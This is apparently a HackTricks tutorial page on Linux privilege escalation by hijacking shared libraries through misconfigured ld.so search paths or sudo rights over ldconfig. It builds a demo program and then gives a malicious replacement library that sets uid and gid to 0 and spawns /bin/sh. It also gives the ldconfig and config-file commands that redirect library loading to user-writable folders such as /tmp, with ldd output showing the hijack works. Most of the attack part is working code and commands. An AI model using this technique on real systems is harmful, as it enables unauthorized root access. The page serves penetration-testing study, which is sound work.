ld.so privesc exploit example

​☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥​
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs​
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Prepare the environment
In the following section you can find the code of the files we are going to use to prepare the environment
sharedvuln.c
libcustom.h
libcustom.c
#include <stdio.h>
#include "libcustom.h"
​
int main(){
    printf("Welcome to my amazing application!\n");
    vuln_func();
    return 0;
}
#include <stdio.h>
​
void vuln_func();
#include <stdio.h>
​
void vuln_func()
{
    puts("Hi");
}
1.Create those files in your machine in the same folder
2.Compile the library: gcc -shared -o libcustom.so -fPIC libcustom.c
3.Copy libcustom.so to /usr/lib: sudo cp libcustom.so /usr/lib (root privs)
4.Compile the executable: gcc sharedvuln.c -o sharedvuln -lcustom
Check the environment
Check that libcustom.so is being loaded from /usr/lib and that you can execute the binary.
$ ldd sharedvuln
	linux-vdso.so.1 =>  (0x00007ffc9a1f7000)
	libcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000)
	
$ ./sharedvuln 
Welcome to my amazing application!
Hi
Exploit
In this scenario we are going to suppose that someone has created a vulnerable entry inside a file in /etc/ld.so.conf/:
sudo echo "/home/ubuntu/lib" > /etc/ld.so.conf.d/privesc.conf
The vulnerable folder is /home/ubuntu/lib (where we have writable access).
Download and compile the following code inside that path:
//gcc -shared -o libcustom.so -fPIC libcustom.c
​
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
​
void vuln_func(){
    setuid(0);
    setgid(0);
    printf("I'm the bad library\n");
    system("/bin/sh",NULL,NULL);
}
Now that we have created the malicious libcustom library inside the misconfigured path, we need to wait for a reboot or for the root user to execute ldconfig (in case you can execute this binary as sudo or it has the suid bit you will be able to execute it yourself).
Once this has happened recheck where is the sharevuln executable loading the libcustom.so library from:
$ldd sharedvuln
	linux-vdso.so.1 =>  (0x00007ffeee766000)
	libcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000)
As you can see it's loading it from /home/ubuntu/lib and if any user executes it, a shell will be executed:
$ ./sharedvuln 
Welcome to my amazing application!
I'm the bad library
$ whoami
ubuntu
Note that in this example we haven't escalated privileges, but modifying the commands executed and waiting for root or other privileged user to execute the vulnerable binary we will be able to escalate privileges.
Other misconfigurations - Same vuln
In the previous example we faked a misconfiguration where an administrator set a non-privileged folder inside a configuration file inside /etc/ld.so.conf.d/.
But there are other misconfigurations that can cause the same vulnerability, if you have write permissions in some config file inside /etc/ld.so.conf.ds, in the folder /etc/ld.so.conf.d or in the file /etc/ld.so.conf you can configure the same vulnerability and exploit it.
Exploit 2
Suppose you have sudo privileges over ldconfig.
You can indicate ldconfig where to load the conf files from, so we can take advantage of it to make ldconfig load arbitrary folders.
So, lets create the files and folders needed to load "/tmp":
cd /tmp
echo "include /tmp/conf/*" > fake.ld.so.conf
echo "/tmp" > conf/evil.conf
Now, as indicated in the previous exploit, create the malicious library inside /tmp.
And finally, lets load the path and check where is the binary loading the library from:
ldconfig -f fake.ld.so.conf
​
ldd sharedvuln
	linux-vdso.so.1 =>  (0x00007fffa2dde000)
	libcustom.so => /tmp/libcustom.so (0x00007fcb07756000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000)
As you can see, having sudo privileges over ldconfig you can exploit the same vulnerability.
I didn't find a reliable way to exploit this vuln if ldconfig is configured with the suid bit. The following error appear: /sbin/ldconfig.real: Can't create temporary cache file /etc/ld.so.cache~: Permission denied
References
​https://www.boiteaklou.fr/Abusing-Shared-Libraries.html​
​https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2​
Dab machine in HTB
​☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥​
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs​
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
lxd/lxc Group - Privilege escalation
Linux Active Directory
Last modified 4mo ago